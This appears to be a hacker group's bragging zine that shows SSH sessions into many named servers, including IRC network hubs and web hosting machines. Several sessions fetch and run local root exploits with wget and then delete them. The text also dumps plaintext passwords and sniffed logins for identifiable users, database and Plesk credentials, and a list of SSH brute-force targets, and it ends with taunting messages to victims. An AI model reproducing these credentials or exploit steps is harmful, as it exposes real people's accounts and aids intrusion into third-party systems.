rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux +bash# exit + + + + + + + +#Other shit 2!! + + + +[root@x0x0x ~]# ssh 82.103.140.20 -l Customer +Customer@82.103.140.20's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ su root +Password: xxxxxx + +bash# uname -a +Linux e82-103-140-20s.easyspeedy.dk 2.6.18-53.el5PAE #1 SMP Mon Nov 12 02:55:09 EST 2007 i686 athlon i386 GNU/Linux +bash# exit + + + + + +#Other shit 3!! + + + +[root@x0x0x ~]# ssh 82.140.8.18 +root@82.140.8.18's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux mx.rockintention.com 2.6.18-8.1.8.el5 #1 SMP Tue Jul 10 06:50:22 EDT 2007 i686 i686 i386 GNU/Linux +bash# exit + + + + + +#Other shit 4!! + + + +[root@x0x0x ~]# ssh 83.140.180.63 (rootpass = mortgage4711) +root@83.140.180.63's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux harry.webguidepartner.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 athlon i386 GNU/Linux +bash# exit + + + + + + +#Other shit 5!! + + + +[root@x0x0x ~]# ssh 82.96.22.90 +root@82.96.22.90's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux se.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux +bash# exit + + + + + + +#Other shit 6!! + + + +[root@x0x0x ~]# ssh 82.103.140.117 +root@82.103.140.117's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux rake 2.6.18-8.1.10.el5 #1 SMP Thu Sep 13 12:17:54 EDT 2007 i686 athlon i386 GNU/Linux +bash# exit + + + + + + +#Other shit 7!! + + + +[root@x0x0x ~]# ssh 83.140.180.3 +root@83.140.180.3's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux failover.webguidepartner.com 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + + + + +#Other shit 8!! + + + +[root@x0x0x ~]# ssh 83.140.43.100 +root@83.140.43.100's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + + + + +#Other shit 9!! + + + +[root@x0x0x ~]# ssh 83.140.43.100 +root@83.140.43.100's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + + + + +#Other shit 10!! + + + +[root@x0x0x ~]# ssh 83.140.43.71 +root@83.140.43.71's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux skalman 2.6.18-8.el5xen #1 SMP Fri Jan 26 14:42:21 EST 2007 i686 i686 i386 GNU/Linux +bash# exit + + + + + + +#Other shit 10!! + + + +[root@x0x0x ~]# ssh 83.140.43.26 +root@83.140.43.26's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + + + + +#Other shit 11!! + + + +[root@x0x0x ~]# ssh 67.192.39.119 +root@83.140.43.26's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux 133972-dev.mortgageloan.com 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 athlon i386 GNU/Linux +bash# exit + + + +OK! Fuck uname´s !! lets go to something more interesting! + + + +[root@x0x0x ~]# ssh 216.240.158.191 -l lcars +lcars@216.240.158.191's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + + +bash$ wget xpl_local_root_leet.bin; chmod a+x xpl_local_root_leet.bin; ./xpl_local_root_leet.bin + +bash# rm -rf xpl_local_root_leet.bin; + +bash# uname -a +Linux kingdom.scns.com 2.6.23.14-64.fc7 #1 SMP Sun Jan 20 23:54:08 EST 2008 i686 i686 i386 GNU/Linux +bash# exit + + + + + + + +............................................. + + ,-. + , ,-. s ,-. + / \ ( r )-( t ) + \ | ,.>-( )-< + \|,' ( )-( ) + Y ___`-' `-' + |/__/ `-' + | + | + | -dubkat my flower- + ___|_____________ + +;................ + + + +OkAy my Friend DuBKat ... i know that u are good person... but i need show u something! lol + + + +[root@x0x0x ~]# ssh 72.37.235.2 -l dubkat +dubkat@72.37.235.2's password: sjpd3139 + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + + +bash$ wget shmat2; chmod a+x shmat2; ./shmat2 +.................................................................. +.................................................................. +.................................................................. +.................................................................. +.................................................................. +.................................................................. +.................................................................. +...........................................p00f! + +NIX@# id + +uid=0(root) gid=0(root) + +bash# rm -rf shmat2; + +bash# uname -a +FreeBSD riley.rsc.cx 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #3: Thu May 24 10:08:07 PDT 2007 sg@riley.rsc.cx:/usr/obj/usr/src/sys/RILEY i386 +bash# exit + + + + + +............................................. +;................QUAKENET HUB + + + +#Thkxxxxxxx g0d + + + + +[root@x0x0x ~]# ssh 64.237.63.164 -l sl +sl@64.237.63.164's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + + +bash$ wget shmat2; chmod a+x shmat2; ./shmat2 +.................................................................. +.................................................................. +.................................................................. +.................................................................. +.................................................................. +.................................................................. +.................................................................. +...........................................p00f! + +NIX@# id + +uid=0(root) gid=0(root) + +bash# rm -rf shmat2; + +bash# uname -a +FreeBSD hub.us.quakenet.org 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Tue May 22 13:08:26 EDT 2007 root@qhub.gameservers.com:/usr/obj/usr/src/sys/QUAKENET i386 + +bash# netstat -na|grep .6667|wc -l +1544 + +# lets drop 6667 ? l0lll + +bash# exit + +Others boxes... that we get on sniff + +´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´ +´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´ +´´´´´ FreeBSD fw.webguidepartner.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #0: Fri Oct 13 03:04:33 UTC 2006 sullrich@builder.livebsd.com:/usr/obj.pfSense/usr/src/sys/pfSense.6 i386 +´´´´´ Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux +´´´´´ Linux lurvas 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux (lurvas.webguidepartner.com) + + + + + + +OLD...... + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + )/_ + _.--..---"-,--c_ + \L..' ._O__)_ +,-. _.+ _ \..--( / + `\.-''__.-' \ ( \_ + `''' `\__ /\ + ') + + + + MONSTERSHELLSSSSSSS (its gone... :(!) + + ~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +[root@x0x0x ~]# ssh phisher1@fire.monstershells.com + +phisher1@fire.monstershells.com's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + + +bash$ sudo su - +Password: +bash# id +uid=0(root) gid=0(root) groups=0(root) +bash# uname -a +FreeBSD fire.monstershells.com 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #0: Fri Feb 15 01:47:13 UTC 2008 root@box.domain.com:/usr/obj/usr/src/sys/fire i386 + + +****** OH THKS IDIOT ******** + + +some logins there + + +||;; +|| +|| login in: john:v1p3r007 +|| login in: icon:anthony1 +|| login in: hack:seven7 +|| login in: kuwait:ln7EZB3LBd +|| login in: absolutely:viper007 +|| login in: shield:H4ilhitler! +|| login in: john:v1p3r007 +||;; + + + +PHISHER YOU ARE My POPSTAR!!! + + +ssh phisher1@home.phisher1.com (98.200.198.242) +phisher1@home.phisher1.com's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + + +bash$ sudo su - +Password: +bash# id +uid=0(root) gid=0(root) groups=0(root) +bash# uname -a +Linux kubuntu 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux +bash# + + + +&&& THKS FOR GIVE UR BOX TO US USE TO CHECK SOME BRUTEFORCE LIST.. THE SAME THAT WE FOUND ON MONSTERSHELLS LOL &&& + + +bash# cd /dev/.tty64; cat list + + +ssh oracle@12.0.42.6 +ssh oracle@128.59.59.62 +ssh oracle@129.173.66.56 +ssh oracle@91.103.96.18 +ssh oracle@84.242.3.6 +ssh oracle@83.17.87.138 +ssh oracle@83.149.192.29 +ssh oracle@82.94.199.146 +ssh oracle@82.91.199.194 +ssh oracle@82.147.71.143 +ssh oracle@83.149.192.29 +ssh oracle@82.147.71.143 +ssh oracle@82.147.130.245 +ssh oracle@82.114.101.66 +ssh oracle@80.190.230.26 +ssh oracle@80.249.110.130 +ssh oracle@80.250.178.89 +ssh oracle@80.251.163.21 +ssh oracle@80.65.128.175 +ssh oracle@209.84.255.105 +ssh oracle@58.120.225.124 +ssh oracle@63.209.12.251 +ssh oracle@68.167.115.234 +ssh oracle@58.120.225.124 +ssh oracle@72.244.100.245 +ssh oracle@58.120.225.124 +ssh oracle@68.167.115.234 +ssh oracle@63.120.68.100 +ssh oracle@63.136.1.22 +ssh oracle@91.103.96.18 +ssh oracle@68.178.81.200 +ssh oracle@82.110.102.235 +ssh oracle@82.110.214.40 +ssh oracle@82.102.93.4 +ssh oracle@81.95.128.1 +ssh oracle@81.95.128.11 +ssh oracle@78.90.100.203 +ssh oracle@80.249.110.130 +ssh oracle@80.250.178.89 +ssh oracle@80.251.163.21 +ssh oracle@209.84.255.105 +ssh oracle@63.123.44.22 +ssh oracle@139.102.15.28 +ssh oracle@128.175.13.183 +ssh oracle@193.86.200.120 +ssh oracle@78.90.100.203 +ssh oracle@82.110.102.235 +ssh oracle@82.94.199.146 +ssh oracle@82.147.71.143 +ssh oracle@129.173.66.56 +ssh oracle@128.59.59.62 +ssh oracle@72.83.128.115 +ssh oracle@139.102.15.28 +ssh oracle@128.59.59.62 +ssh oracle@72.83.128.115 +ssh oracle@128.175.13.183 +ssh oracle@12.111.69.145 +ssh oracle@128.175.13.183 +ssh oracle@12.111.69.145 +ssh oracle@72.244.100.245 +ssh oracle@80.190.230.26 +ssh oracle@139.102.15.28 +ssh oracle@casaba.cc.columbia.edu +ssh oracle@128.59.59.62 +ssh oracle@139.102.15.28 +ssh oracle@139.102.15.33 +ssh oracle@139.102.15.28 +ssh root@213.239.174.129 +ssh math402@master.queensu.ca +ssh math402@mast.queensu.ca +ssh root@74.221.128.106 +ssh root@213.239.174.129 +ssh math402@mast.queensu.ca +ssh oracle@129.173.66.56 +ssh 213.239.174.129 -l root +ssh oracle@209.5.106.100 +ssh oracle@209.84.255.104 +ssh oracle@209.84.255.104 +ssh oracle@209.84.255.105 +ssh oracle@130.89.1.65 +ssh oracle@130.192.112.103 +ssh oracle@130.60.68.125 +ssh oracle@194.204.32.101 +ssh oracle@80.251.163.21 +ssh oracle@80.250.178.89 +ssh oracle@80.249.110.130 +ssh oracle@80.190.230.26 +ssh oracle@82.102.93.4 +ssh oracle@80.65.128.175 +ssh oracle@82.147.130.245 +ssh oracle@80.65.128.175 +ssh oracle@82.102.93.4 +ssh oracle@80.190.230.26 +ssh oracle@80.249.110.130 + +bash# nohup ./brute list >> /dev/null & + +l0000000000lll + + + + +((((((((((((((( OKAY I WILL PASTE NOW SOME SNIFF LOGS )))))))))))))))))))))) + + +#COOL CORPORATION OF EFNET GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOD + +66.109.20.52/corp.efnet.net (stevoo:1qaz,2wsx) (venial:n1gg0rv3n) - FreeBSD corp.efnet.net 6.3-STABLE FreeBSD 6.3-STABLE #0: Fri Feb 8 21:24:16 UTC 2008 root@corp.efnet.net:/usr/obj/usr/src/sys/corp i386 | cat /home/venial/psybnc/lang/french.lng + +72.20.13.30/box.observers.net (venial:n1gg0rv3n) (coldfyre:qksq90a) - FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006 root@box.observers.net:/usr/obj/usr/src/sys/obs i386 + +85.24.148.29/evilbsd.com (venial:n1gg0rv3n) - FreeBSD epic.xzibition.com 5.4-RELEASE-p16 FreeBSD 5.4-RELEASE-p16 #1: Sat Jun 17 00:03:34 CEST 2006 root@epic.outlandz.net:/usr/obj/usr/src/sys/EPIC i386 i386 Intel(R) Pentium(R) 4 CPU 3.00GHz FreeBSD + +72.20.48.65/echo.xzibition.com (venial:n1gg0rv3n) - FreeBSD echo.xzibition.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #1: Fri Nov 3 23:59:29 UTC 2006 root@echo.outlandz.net:/usr/obj/usr/src/sys/ECHO i386 + +212.71.19.102/users.geekshells.org (venial:n1gg0rv3n) - FreeBSD spark.ofloo.net 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #11: Sun Feb 17 13:18:10 CET 2008 ofloo@spark.ofloo.net:/usr/obj/usr/src/sys/OFL i386 + +& THKX VENIAL********************* + + + + + + + + + +[root@x0x0x ~]# ssh accord.lyms.org -l smyl +smyl@accord.lyms.org's password: ^(x187 + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ sudo su root +Password: xxxxxx + +bash# uname -a +FreeBSD accord.lyms.org 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #0: Fri Jun 15 11:27:14 PDT 2007 root@accord.lyms.org:/usr/obj/usr/src/sys/FOO i386 +bash# exit + + + + + + +@#@#@###@#@ smyl you are really expert... making password of nsdfix.accesshost.us same as accord.lyms.org!! thks very much!!@#@@#@#@##@#@# + + + +[root@x0x0x ~]# ssh nsdfix.accesshost.us -l smyl +smyl@nsdfix.accesshost.us's password: ^(x187 + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ sudo su root +Password: xxxxxx + +bash# uname -a +Linux nsdfix.accesshost.us 2.6.18-6-486 #1 Sun Feb 10 22:06:33 UTC 2008 i686 GNU/Linux +bash# exit + + + + + + +#@#@#@##@ OKAY... dont try change ur password!! i will hack again... + + + +[root@x0x0x ~]# ssh 64.18.144.130 -l smyl +smyl@64.18.144.130 's password: ^(x187 + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ sudo su root +Password: xxxxxx + + +// (dak- owned ?) + + +bash# cat /etc/passwd|grep dak|wc -l +1 +bash# uname -a +FreeBSD rock.accessshells.us 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 18 20:45:44 EDT 2007 root@rock.accessshells.us:/usr/obj/usr/src/sys/LSD i386 +bash# exit + + + + + +;;;;;;;........... + + ___ ___ + / \____/ \ NO WOMAN + / / __ \ \ NO BALLS +/ | .. | \ +\___/| |\___/\ + | |_| |_| \ + | |/|__|\| \ + | |__| |\ + | |__| |_/ / \ + | @ | | @ || @ | ' + | |~~| || | HF + 'ooo' 'ooo''ooo' + + + +cat somesniff_log; + + the domain for dev: dredgemedia.org, un: dredgemediaorg pass: g3u5nonwrp + plesk login: https://dredgemedia.org:8443 + db name: pu username: dredge_pu_dev pass: ip35jrt24 + + + +.......................(dont worry, be happy!) l0l + + + + + + + +staring on x0x0x2; + + + ----------- + ´ ` + ´ - monstershells + ´ ´ + ´ phisher1 + ´ o + ´ | + | / \ hub.us.quakenet.org __ *webguidepartner.com + |- efnet - / \ ---´ sonny ´ + ´ / \ ´ ----´ +dukat+------- -------+stevoo efnet.port80.se´ + \ \union/ / `---´ + / / \ \ +venial+----- -----+smyl/dak some shells + `- `---´ + `some shells + + + + / / + .'<_.-._.'< + / \ .^. + ._ | -+- -+- | (_|_) + r- |\ \ / / // + /\ \\ : \ -=- / \\ + `. \\.' ___.__`..;._.-'---... // + ``\\ __.--" `;' __ `-. + /\\.--"" __., ""-. ". + ;=r __.---" | `__ __' / .' .' + '=/\\"" \ .' .' + \\ | __ __ / | + \\ | -- -- //`'`' + \\ | -- -- ' | // + \\ | . |// r.s.t. + +~> messages + + (*) stevoo - Open your eyes is a good way to avoid punches! (see stevoo picture, to understand this, LOL) + (*) phisher1 - You are easy! think this. learn more www.linux.org/lessons/. + (*) smyl - Teach about security lol http://apex.vtc.com/linux-security.php. + (*) venial - We like you, but don´t be kiddie. + (*) dubkat - You are 100% pwned, keed quiet. + (*) ik - Do not be shown. We wont make fun about you. + (*) misery - As you asked, your nick dont be here! Do not make to be :) ! + (*) dtr - NEXT TARGET! + (*) dmer [at] brlink - Open your eyes. + (*) ? - Don´t keep in us way. + + +*'no much patience to do this zine'* + + + +^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ +^^^^^^^ thkx to #soldiers @ efnet ^^^^^^^ +^^^^^^^ g. and ^^^^^^^ +^^^^^^^ all blackhats! ^^^^^^^ +^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^ + + +# x0x0x r. - s. - t. +# +# wanna send us a message? x0x0xcr3w [at] gmail [dot] com +# +# EOF \ No newline at end of file